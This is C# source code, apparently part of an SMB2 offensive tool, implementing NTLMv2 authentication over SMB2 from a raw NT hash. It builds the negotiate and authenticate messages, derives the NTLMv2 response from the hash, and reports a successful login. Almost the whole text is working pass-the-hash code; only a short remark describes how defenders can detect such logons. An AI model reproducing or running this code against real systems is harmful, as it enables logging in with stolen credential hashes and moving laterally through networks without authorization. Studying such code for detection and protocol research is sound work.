        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
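        /// <summary>
        /// Sends the first SMB2 SESSION_SETUP request carrying an NTLMSSP NEGOTIATE security blob
        /// and reads the server's reply into the shared <c>recieve</c> buffer.
        /// </summary>
        /// <remarks>
        /// The frame is NetBIOS session service prefix + SMB2 header (command 0x0001, SESSION_SETUP)
        /// + SESSION_SETUP request. The reply is left in <c>recieve</c> for <c>Authenticate</c>, which
        /// expects to find the NTLMSSP CHALLENGE in it. Advances <c>messageId</c> as a side effect.
        /// </remarks>
        /// <exception cref="System.IO.IOException">The remote end closed the connection before replying.</exception>
        internal void NTLMSSPNegotiate()
        {
            // SMB2 header: SESSION_SETUP, 0x1f credits requested, next message id and the current ids.
            SMB2Header header = new SMB2Header();
            header.SetCommand(new Byte[] { 0x01, 0x00 });
            header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 });
            header.SetMessageID(++messageId);
            header.SetProcessID(processId);
            header.SetTreeId(treeId);
            header.SetSessionID(sessionId);
            Byte[] bHeader = header.GetHeader();

            // Security blob: NTLMSSP NEGOTIATE built with the configured negotiate flags.
            SMB2NTLMSSPNegotiate negotiate = new SMB2NTLMSSPNegotiate(version);
            negotiate.SetFlags(flags);
            Byte[] bNegotiate = negotiate.GetSMB2NTLMSSPNegotiate();

            SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest();
            sessionSetup.SetSecurityBlob(bNegotiate);
            Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest();

            // NetBIOS session service prefix carrying the length of header + data.
            NetBIOSSessionService sessionService = new NetBIOSSessionService();
            sessionService.SetHeaderLength(bHeader.Length);
            sessionService.SetDataLength(bData.Length);
            Byte[] bSessionService = sessionService.GetNetBIOSSessionService();

            Byte[] send = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
            streamSocket.Write(send, 0, send.Length);
            streamSocket.Flush();

            // Clear the shared buffer first so bytes left over from an earlier reply cannot be
            // mistaken for part of this one, then fail loudly if the peer closed the connection
            // instead of letting the caller parse an empty/stale buffer.
            Array.Clear(recieve, 0, recieve.Length);
            Int32 read = streamSocket.Read(recieve, 0, recieve.Length);
            if (read == 0)
            {
                throw new System.IO.IOException("Connection closed by the remote host while waiting for the SESSION_SETUP response.");
            }
            // NOTE(review): a single Read may return fewer bytes than the full SMB2 message; a complete
            // implementation would loop until the NetBIOS-announced length has been received.
        }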
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
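        /// <summary>
        /// Completes an NTLMv2 logon over SMB2 from an NT hash: parses the NTLMSSP CHALLENGE that
        /// <c>NTLMSSPNegotiate</c> left in <c>recieve</c>, computes the NTLMv2 response, sends it in a
        /// second SESSION_SETUP request and reports whether the server accepted it.
        /// </summary>
        /// <param name="domain">Domain or workstation name the account belongs to.</param>
        /// <param name="username">Account name; upper-cased with the invariant culture when deriving the NTLMv2 key.</param>
        /// <param name="hash">NT hash as a hex string (even length; 32 hex digits for a standard 16-byte hash).</param>
        /// <returns><see langword="true"/> if the final SESSION_SETUP status indicates success; <see langword="false"/>
        /// otherwise, including when the challenge cannot be parsed or the connection is closed.</returns>
        /// <exception cref="ArgumentNullException">An argument is <see langword="null"/>.</exception>
        /// <exception cref="ArgumentException"><paramref name="hash"/> is empty or has odd length.</exception>
        /// <exception cref="FormatException"><paramref name="hash"/> contains non-hexadecimal characters.</exception>
        /// <remarks>
        /// Side effects: advances <c>messageId</c>, updates <c>sessionId</c> from the challenge response, sets
        /// <c>sessionKey</c> when <c>signing</c> is enabled, and overwrites <c>recieve</c> with the server's reply.
        /// Defender note: a hash-based logon is indistinguishable on the wire from an ordinary NTLMv2 network
        /// logon; visibility comes from host logon auditing (NTLM network logons from unexpected sources) and
        /// from NTLM restriction/auditing policies, and the mitigation is reducing where NTLM is accepted at all.
        /// </remarks>
        internal Boolean Authenticate(String domain, String username, String hash)
        {
            if (domain == null) throw new ArgumentNullException(nameof(domain));
            if (username == null) throw new ArgumentNullException(nameof(username));
            if (hash == null) throw new ArgumentNullException(nameof(hash));

            // Find the NTLMSSP CHALLENGE ("NTLMSSP\0") in the raw SESSION_SETUP response. Searching the bytes
            // directly avoids the hex-dump search, which could match on a nibble boundary and silently fell
            // back to offset 0 (IndexOf == -1, divided by 2) when the signature was absent.
            Int32 index = IndexOfBytes(recieve, new Byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
            // CHALLENGE_MESSAGE fixed part is 56 bytes: TargetName length at +12, ServerChallenge at +24,
            // TargetInfo length at +40, payload (TargetName followed by TargetInfo AV pairs) from +56.
            if (index < 0 || index + 56 > recieve.Length)
            {
                Console.WriteLine("[-] No NTLMSSP challenge found in the server response");
                return false;
            }

            UInt16 targetNameLength = BitConverter.ToUInt16(recieve, index + 12);
            UInt16 targetInfoLength = BitConverter.ToUInt16(recieve, index + 40);
            Int32 targetInfoStart = index + 56 + targetNameLength;
            // The timestamp is taken from the last 12 bytes of TargetInfo (8-byte value + 4-byte EOL pair),
            // so anything shorter than that, or running past the buffer, cannot be used.
            if (targetInfoLength < 12 || targetInfoStart + targetInfoLength > recieve.Length)
            {
                Console.WriteLine("[-] Malformed NTLMSSP challenge (target info out of range)");
                return false;
            }

            // SMB2 header SessionId: 4-byte NetBIOS prefix + header offset 40.
            sessionId = SliceBytes(recieve, 44, 8);
            Byte[] serverChallenge = SliceBytes(recieve, index + 24, 8);
            Byte[] targetInfo = SliceBytes(recieve, targetInfoStart, targetInfoLength);
            // Assumes the server's timestamp AV pair is the last one before MsvAvEOL (as the original code did).
            Byte[] timestamp = SliceBytes(targetInfo, targetInfo.Length - 12, 8);

            Byte[] ntHash = HexToBytes(hash);
            Byte[] domainBytes = Encoding.Unicode.GetBytes(domain);
            Byte[] usernameBytes = Encoding.Unicode.GetBytes(username);
            Byte[] hostnameBytes = Encoding.Unicode.GetBytes(Environment.MachineName);

            // NTOWFv2 = HMAC_MD5(NT hash, UNICODE(UPPERCASE(user) + domain)). The invariant culture keeps the
            // key independent of the local culture's casing rules.
            Byte[] ntlmv2Key = HmacMd5(ntHash, ConcatBytes(Encoding.Unicode.GetBytes(username.ToUpperInvariant()), domainBytes));

            // The client challenge must be unpredictable: use the CSPRNG rather than System.Random
            // (whose Next(0, 255) also never yielded 0xFF because the upper bound is exclusive).
            Byte[] clientChallenge = new Byte[8];
            using (RandomNumberGenerator rng = RandomNumberGenerator.Create())
            {
                rng.GetBytes(clientChallenge);
            }

            // NTLMv2 "blob": RespType 1, HiRespType 1, 6 reserved bytes, timestamp, client challenge,
            // 4 reserved bytes, the server's TargetInfo, 8 bytes of trailing zero padding.
            Byte[] blob = ConcatBytes(
                new Byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 },
                timestamp,
                clientChallenge,
                new Byte[4],
                targetInfo,
                new Byte[8]);

            // NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge + blob); the NT response is NTProofStr + blob.
            Byte[] ntProof = HmacMd5(ntlmv2Key, ConcatBytes(serverChallenge, blob));
            if (signing)
            {
                // Session base key used for SMB2 signing: HMAC_MD5(NTOWFv2, NTProofStr).
                sessionKey = HmacMd5(ntlmv2Key, ntProof);
            }
            Byte[] ntResponse = ConcatBytes(ntProof, blob);

            // Payload offsets after the 64-byte fixed part of the AUTHENTICATE message:
            // domain, user, workstation, 24 zero bytes in place of an LM response, NTLMv2 response.
            // No session key bytes are appended; that field only carries sessionKeyLength and its offset.
            Int32 domainOffset = 64;
            Int32 usernameOffset = domainOffset + domainBytes.Length;
            Int32 hostnameOffset = usernameOffset + usernameBytes.Length;
            Int32 lmOffset = hostnameOffset + hostnameBytes.Length;
            Int32 ntOffset = lmOffset + 24;
            Int32 sessionKeyOffset = ntOffset + ntResponse.Length;

            Byte[] authenticate = ConcatBytes(
                new Byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 },               // "NTLMSSP\0"
                new Byte[] { 0x03, 0x00, 0x00, 0x00 },                                       // MessageType 3 = AUTHENTICATE
                NtlmField(24, lmOffset),                                                     // LmChallengeResponse (zeroed)
                NtlmField(ntResponse.Length, ntOffset),                                      // NtChallengeResponse
                NtlmField(domainBytes.Length, domainOffset),                                 // DomainName
                NtlmField(usernameBytes.Length, usernameOffset),                             // UserName
                NtlmField(hostnameBytes.Length, hostnameOffset),                             // Workstation
                sessionKeyLength, sessionKeyLength, BitConverter.GetBytes(sessionKeyOffset), // EncryptedRandomSessionKey
                flags,                                                                       // NegotiateFlags
                domainBytes,
                usernameBytes,
                hostnameBytes,
                new Byte[24],
                ntResponse);

            // Second SESSION_SETUP, now carrying the session id returned with the challenge.
            SMB2Header header = new SMB2Header();
            header.SetCommand(new Byte[] { 0x01, 0x00 });
            header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 });
            header.SetMessageID(++messageId);
            header.SetProcessID(processId);
            header.SetTreeId(treeId);
            header.SetSessionID(sessionId);
            Byte[] bHeader = header.GetHeader();

            NTLMSSPAuth ntlmSSPAuth = new NTLMSSPAuth();
            ntlmSSPAuth.SetNetNTLMResponse(authenticate);
            Byte[] bNTLMSSPAuth = ntlmSSPAuth.GetNTLMSSPAuth();

            SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest();
            sessionSetup.SetSecurityBlob(bNTLMSSPAuth);
            Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest();

            NetBIOSSessionService sessionService = new NetBIOSSessionService();
            sessionService.SetHeaderLength(bHeader.Length);
            sessionService.SetDataLength(bData.Length);
            Byte[] bSessionService = sessionService.GetNetBIOSSessionService();

            Byte[] send = ConcatBytes(bSessionService, bHeader, bData);
            streamSocket.Write(send, 0, send.Length);
            streamSocket.Flush();

            // Clear stale bytes before reading so the status check below cannot see the previous reply, and
            // require at least the NetBIOS prefix + SMB2 header (4 + 12 bytes up to Status) before trusting it:
            // an all-zero status would otherwise read as success.
            Array.Clear(recieve, 0, recieve.Length);
            Int32 read = streamSocket.Read(recieve, 0, recieve.Length);
            if (read < 16)
            {
                Console.WriteLine("[-] Short or empty response from the remote host");
                return false;
            }
            // NOTE(review): a single Read may still return a partial message; only the header is checked here.

            // SMB2 header Status: 4-byte NetBIOS prefix + header offset 8.
            Boolean success = GetStatus(SliceBytes(recieve, 12, 4));
            if (success)
            {
                Console.WriteLine("[+] Login Successful");
            }
            return success;
        }

        /// <summary>Returns the index of the first occurrence of <paramref name="needle"/> in <paramref name="haystack"/>, or -1.</summary>
        private static Int32 IndexOfBytes(Byte[] haystack, Byte[] needle)
        {
            for (Int32 i = 0; i + needle.Length <= haystack.Length; i++)
            {
                Int32 matched = 0;
                while (matched < needle.Length && haystack[i + matched] == needle[matched])
                {
                    matched++;
                }
                if (matched == needle.Length)
                {
                    return i;
                }
            }
            return -1;
        }

        /// <summary>
        /// Copies <paramref name="count"/> bytes starting at <paramref name="offset"/>, clamping both to the array
        /// bounds the way <c>Skip(offset).Take(count)</c> would (never throws; may return fewer bytes).
        /// </summary>
        private static Byte[] SliceBytes(Byte[] source, Int32 offset, Int32 count)
        {
            Int32 start = Math.Max(0, Math.Min(offset, source.Length));
            Int32 length = Math.Max(0, Math.Min(count, source.Length - start));
            Byte[] result = new Byte[length];
            Buffer.BlockCopy(source, start, result, 0, length);
            return result;
        }

        /// <summary>Concatenates the given byte arrays in order.</summary>
        private static Byte[] ConcatBytes(params Byte[][] parts)
        {
            Int32 total = 0;
            foreach (Byte[] part in parts)
            {
                total += part.Length;
            }
            Byte[] result = new Byte[total];
            Int32 position = 0;
            foreach (Byte[] part in parts)
            {
                Buffer.BlockCopy(part, 0, result, position, part.Length);
                position += part.Length;
            }
            return result;
        }

        /// <summary>Decodes a hex string into bytes.</summary>
        /// <exception cref="ArgumentException">The string is empty or has odd length.</exception>
        /// <exception cref="FormatException">A character is not a hexadecimal digit.</exception>
        private static Byte[] HexToBytes(String hex)
        {
            if (hex.Length == 0 || hex.Length % 2 != 0)
            {
                throw new ArgumentException("Hash must be a non-empty hex string of even length.", nameof(hex));
            }
            Byte[] bytes = new Byte[hex.Length / 2];
            for (Int32 i = 0; i < bytes.Length; i++)
            {
                bytes[i] = Convert.ToByte(hex.Substring(i * 2, 2), 16);
            }
            return bytes;
        }

        /// <summary>HMAC-MD5 of <paramref name="data"/> under <paramref name="key"/>, the primitive NTLMv2 is built on.</summary>
        private static Byte[] HmacMd5(Byte[] key, Byte[] data)
        {
            using (HMACMD5 hmac = new HMACMD5(key))
            {
                return hmac.ComputeHash(data);
            }
        }

        /// <summary>
        /// NTLM field descriptor: 16-bit Len, 16-bit MaxLen (same value) and 32-bit BufferOffset, in the byte
        /// order BitConverter produces on this platform (little-endian on the supported targets).
        /// </summary>
        private static Byte[] NtlmField(Int32 length, Int32 offset)
        {
            Byte[] len = BitConverter.GetBytes((UInt16)length);
            return ConcatBytes(len, len, BitConverter.GetBytes(offset));
        }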